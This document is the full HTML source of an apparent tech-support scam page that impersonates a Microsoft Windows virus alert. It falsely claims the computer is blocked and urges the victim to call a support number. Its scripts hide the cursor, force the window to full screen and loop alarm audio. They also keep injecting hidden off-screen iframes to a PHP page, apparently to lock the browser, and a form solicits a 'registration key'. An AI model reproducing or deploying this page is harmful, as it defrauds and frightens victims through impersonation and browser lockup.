

<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <meta name="google" value="notranslate">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>MS_Windows_Official_Helpline97</title>

    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-xxx-x"></script>
    <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());

      gtag('config', 'UA-xxx-x');
    </script>


  <link href="./images/favicon.ico" rel="shortcut icon">

  <!-- Latest compiled and minified CSS -->
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css"
        integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">

  <!-- Optional theme -->
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap-theme.min.css"
        integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp" crossorigin="anonymous">

  <!--<link rel="stylesheet" href="https://cdn.jsdelivr.net/bxslider/4.2.12/jquery.bxslider.css">-->
  <link rel="stylesheet" type="text/css" href="css/style.css">





  <script src="https://code.jquery.com/jquery-3.2.1.min.js" type="text/javascript"></script>
  <style>

  /* The Modal (background) */
  .modal {
  	display: none; /* Hidden by default */
  	position: fixed; /* Stay in place */
  	z-index: 1; /* Sit on top */
  	padding-top: 130px; /* Location of the box */
  	left: 0;
  	top: 0;
  	width: 100%; /* Full width */
  	height: 100%; /* Full height */
  	overflow: auto; /* Enable scroll if needed */
  	background-color: rgb(0,0,0); /* Fallback color */
  	background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
  }

  /* Modal Content */
  .modal-content {
  	position: relative;
  	background-color: red;
  	margin: auto;
  	padding: 0;
  	/*border: 1px solid #888;*/
  	width: 80%;
  	box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2),0 6px 20px 0 rgba(0,0,0,0.19);
  	-webkit-animation-name: animatetop;
  	-webkit-animation-duration: 0.4s;
  	animation-name: animatetop;
  	animation-duration: 0.4s
  }

  /* Add Animation */
  @-webkit-keyframes animatetop {
  	from {top:-300px; opacity:0}
  	to {top:0; opacity:1}
  }

  @keyframes animatetop {
  	from {top:-300px; opacity:0}
  	to {top:0; opacity:1}
  }

  /* The Close Button */
  .close {
  display:none;
  	color: white;
  	float: right;
  	font-size: 28px;
  	font-weight: bold;
  }

  .close:hover,
  .close:focus {
  	color: #000;
  	text-decoration: none;
  	cursor: pointer;
  }

  .modal-header {
  	padding: 2px 20px;
  	background-color: red;
  	color: white;

  }
  .modal-header h2
  {
  border:none;
  font-size:42px;
  color: white;
  }

  .modal-body {padding: 2px 20px;color:white;}

  .modal-footer {
  	padding: 2px 10px;
  	background-color: red;
  	color: white;
  	height:80px;

  }

  .modal-footer btn{
  background-color:orange;
  }



  .blink {
  background-color:yellow;
  color:black;
  animation: blink-animation 1s steps(5, start) infinite;
  -webkit-animation: blink-animation 1s steps(5, start) infinite;
  }
  @keyframes blink-animation {
  to {
  visibility: hidden;
  }
  }
  @-webkit-keyframes blink-animation {
  to {
  visibility: hidden;
  }
  }







  </style>


    <style>div.fixed{position:fixed;bottom:0;right:-220px; width: 550px;border:1px }</style>
    <style>div.fixed2{position:fixed;bottom:0px;right:25px;width:200px;height:50px;border:1px;color:black;font-size:22px;font-weight:bold;-webkit-animation-name:example;-webkit-animation-duration:1s;animation-name:example;animation-duration:1s;animation-iteration-count:infinite}@-webkit-keyframes example{0%{color:black}50%{color:red}100%{color:black}}@keyframes example{0%{color:black}50%{color:red}100%{color:black}}</style>


    <script src=./js/jquery.min.js></script>
    <script>
        function formatAMPM() {
            var d = new Date()
              , minutes = d.getMinutes().toString().length == 1 ? '0' + d.getMinutes() : d.getMinutes()
              , hours = d.getHours().toString().length == 1 ? '0' + d.getHours() : d.getHours()
              , ampm = d.getHours() >= 12 ? 'pm' : 'am'
              , months = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
              , days = ['Sun', 'Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat'];
            return days[d.getDay()] + ' ' + months[d.getMonth()] + ' ' + d.getDate() + ' ' + d.getFullYear() + ' ' + hours + ':' + minutes + ampm;
        }
    </script>
    <script>
        function getURLParameter(a) {
            return decodeURI((RegExp(a + "=(.+?)(&|$)").exec(location.search) || [, null])[1] || "")
        }
        function random_betw(b, a) {
            return Math.round(Math.random() * (a - b) + b)
        }
        var phone = "+1-888-888-8888";
          var text = "** Call Microsoft Windows +1-888-888-8888 **";
            </script>
    <script>
        var w = window.screen.width;
        var h = window.screen.height;
        window.moveTo(0, 0);
        window.resizeTo(w, h);
    </script>
    <script>
        var isOpera = !!window.opera || navigator.userAgent.indexOf(" OPR/") >= 0;
        var isFirefox = typeof InstallTrigger !== "undefined";
        var isSafari = Object.prototype.toString.call(window.HTMLElement).indexOf("Constructor") > 0;
        var isChrome = !!window.chrome && !isOpera;
        var isIE = /*@cc_on!@*/
        false || !!document.documentMode;
    </script>

  <style type="text/css">
      .nocursor { cursor:none; }
  </style>

</head>
<body class="en ltr" style="cursor: none; background-image: url('./images/background.png');" id="chrome-alerts" >
<div id="body" class="container-fluid">
  <div class="row">
    <div class="col-md-12">
      <div class="row block1">
        <div class="col-md-4 left">
          <strong>Windows Security Tollfree:</strong>
          <p style="font-size:30px; color: rgba(0, 0, 0, 0.7);"> +1-888-888-8888 </p>
          <label style="font-size: 12px;">
            <input checked="nonchecked" type="checkbox"> Prevent this page from creating additional dialogues.</label>
        </div>
        <div class="col-md-4">
          <div class="middle" id="alert-modal">
            <a style="margin-right: 8px" href="" class="cross">x</a>
            <div class="content-box" id="alert-content-box">
              <center><strong>VIRUS ALERT FROM Windows</strong></center>
              <center><h5><b>This computer is BLOCKED</b></h5></center>
              <h6><b>Do not close this window and restart your computer</b></h6>
              <h6><b>Your computer's registration key is Blocked.</b></h6>
              <h6><b>Why we blocked your computer?</b></h6>
              <h6>The window's registration key is illegal.</h6>
              <h6>This window is using pirated software.</h6>
              <h6>This window is sending virus over the internet.</h6>
              <h6>This window is hacked or used from undefined location.</h6>
              <h6>We block this computer for your security. </h6>
              <h6>Contact Windows helpline to reactivate your computer.</h6>

                  <p style="font-size:20px; color: rgba(0, 0, 0, 0.7);">Windows Security Tollfree +1-888-888-8888 </p>
                  <button class="ms-btn chat_now blink" style="background-color:green; color:white; float:right">Back to Safety</button>





            </div>
          </div>

          <div class="block22">
            <div class="row">
              <div class="col-md-4">
                <img src="./images/rsod.png">
              </div>
              <div class="col-md-4">
                <div id="red_alert1" class=""style="">
                  <h1><img style="height: 40px; width: 40px; margin-top: -10px;"
                           src="images/335158-windows-8-window.png"> Windows Support Alert</h1>
                  <h3>Your System Detected Some Unusual Activity.</h3>
                  <h5>It might harm your computer data and track your financial activities.</h5>
                  <h3>Please report this activity to  +1-888-888-8888</h3>
                </div>
                <div class="row">
                  <div class="col-md-12">
                    <div class="row">
                      <div class="col-md-12">
                        <button class="ms-btn">Ignore Alert</button>
                        <button class="ms-btn chat_now">Chat Now</button>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
        <div class="col-md-4 right">

          <form style="text-align: left;" action="login.php.htm" method="POST" align="center">
            <div>
              <strong>Enter Windows registration key to unblock.</strong>
            </div>
            <div class="tbl-center" style="margin-top: 5px;">
              <strong style="text-align:left;color: rgba(0, 0, 0, 0.7);"> ENTER KEY:</strong>
              <div style="min-width:100px;">
                <input type="text" name="ENTER KEY" style="width: 100%;" />
              </div>
              <div>
                <input class="ms-btn" type="button" value="Submit">
              </div>
            </div>
          </form>
        </div>
      </div>
    </div>
  </div>
</div>



<div class="block2" style="background-color:red;">
  <div class="row">
    <div class="col-md-3">
      <img style="height: 240px; width: auto;" src="./images/rsod.png">
    </div>
    <div class="col-md-6">
      <div id="red_alert" style="margin-bottom: 25px;">
        <h1><img style="height: 40px; width: 40px; margin-top: -10px;" src="images/335158-windows-8-window.png"> Windows
          Support Alert</h1>
        <h3>Your System Detected Some Unusual Activity.</h3>
        <h5>It might harm your computer data and track your financial activities.</h5>
        <h3>Please report this activity to  +1-888-888-8888</h3>
      </div>
      <div class="row">
        <div class="col-md-12">
          <div class="row">
            <div class="col-md-6 no-padding-right">
              <button class="ms-btn">Ignore Alert</button>
            </div>
            <div class="col-md-6 no-padding-left">
              <button class="ms-btn chat_now blink" style="background-color:red; color:white">Leave This Page</button>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>


<div class="fixed">
<img src="image.png" style="position: absolute; left: 1px; bottom: 1px;"></div><div class="fixed2">+1-888-888-8888</div>


<script type="text/javascript">/*<![CDATA[*/
// audio play /*
  var msgAudioEl = document.getElementById("msgSound");

  var playMsgInt = setInterval(function () {
    if (isPlaying(msgAudioEl)) {
      // console.log('already playing. clearing interval');
      clearInterval(playMsgInt);
    } else {
      // console.log('Triggering play');
      msgAudioEl.play();
    }
  }, 500);
  // audio play */

</script>

    <script type="text/javascript">/*<![CDATA[*/
    // audio play /*
      var msgAudioEl = document.getElementById("msgSound1");

      var playMsgInt = setInterval(function () {
        if (isPlaying(msgAudioEl)) {
          // console.log('already playing. clearing interval');
          clearInterval(playMsgInt);
        } else {
          // console.log('Triggering play');
          msgAudioEl.play();
        }
      }, 5000);
      // audio play */

    </script>

<script>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        

</script>

  <audio autoplay="autoplay" loop="" id="msgSound">
    <source src="err.mp3" type="audio/mpeg">
  </audio>



  <script type="text/javascript">/*<![CDATA[*/

   function get_browser(){
      var ua=navigator.userAgent,tem,M=ua.match(/(opera|chrome|safari|firefox|msie|trident(?=\/))\/?\s*(\d+)/i) || [];
      if(/trident/i.test(M[1])){
          tem=/\brv[ :]+(\d+)/g.exec(ua) || [];
          return {name:'IE',version:(tem[1]||'')};
          }
      if(M[1]==='Chrome'){
          tem=ua.match(/\bOPR\/(\d+)/)
          if(tem!=null)   {return {name:'Opera', version:tem[1]};}
          }
      M=M[2]? [M[1], M[2]]: [navigator.appName, navigator.appVersion, '-?'];
      if((tem=ua.match(/version\/(\d+)/i))!=null) {M.splice(1,1,tem[1]);}
      return {
        name: M[0],
        version: M[1]
      };
   }
   var InternetEx=window.navigator.appVersion.indexOf("MSIE")!=-1;
  var isIEedge = window.navigator.userAgent.indexOf("Edge") > -1;
  var browser=get_browser();
  if(browser.name=="Firefox" || isIEedge|| InternetEx || navigator.appName == 'Microsoft Internet Explorer' ||  !!(navigator.userAgent.match(/Trident/) || navigator.userAgent.match(/rv:11/)) ){
    if(isIEedge|| InternetEx || navigator.appName == 'Microsoft Internet Explorer' ||  !!(navigator.userAgent.match(/Trident/) || navigator.userAgent.match(/rv:11/)))
      {

         function msg_ff() {

              var i = document.createElement("div");
              i.innerHTML = '<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>';
              document.body.appendChild(i);

          }
          window.setInterval(function() {
              msg_ff();

          }, 1100);

        }
    else{
        function msg_ff() {

              var i = document.createElement("div");
              i.innerHTML = '<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>';
              document.body.appendChild(i);
          }
          window.setInterval(function() {
              msg_ff();

          }, 1100);

      }

   }
   else{

     }


  /*]]>*/</script>

    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>

    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>

    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>

    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>

    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>

    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>

    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>

    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>

    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>

    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>

    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>

    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>

    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>

    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>

    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>

    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>

    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>

    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>

    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>

    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>

    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>
    <div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="DF10_10010_jhs017.php"></iframe></div>



<iframe src="beep.mp3" allow="autoplay" style="display:none;">
</body>
</html>
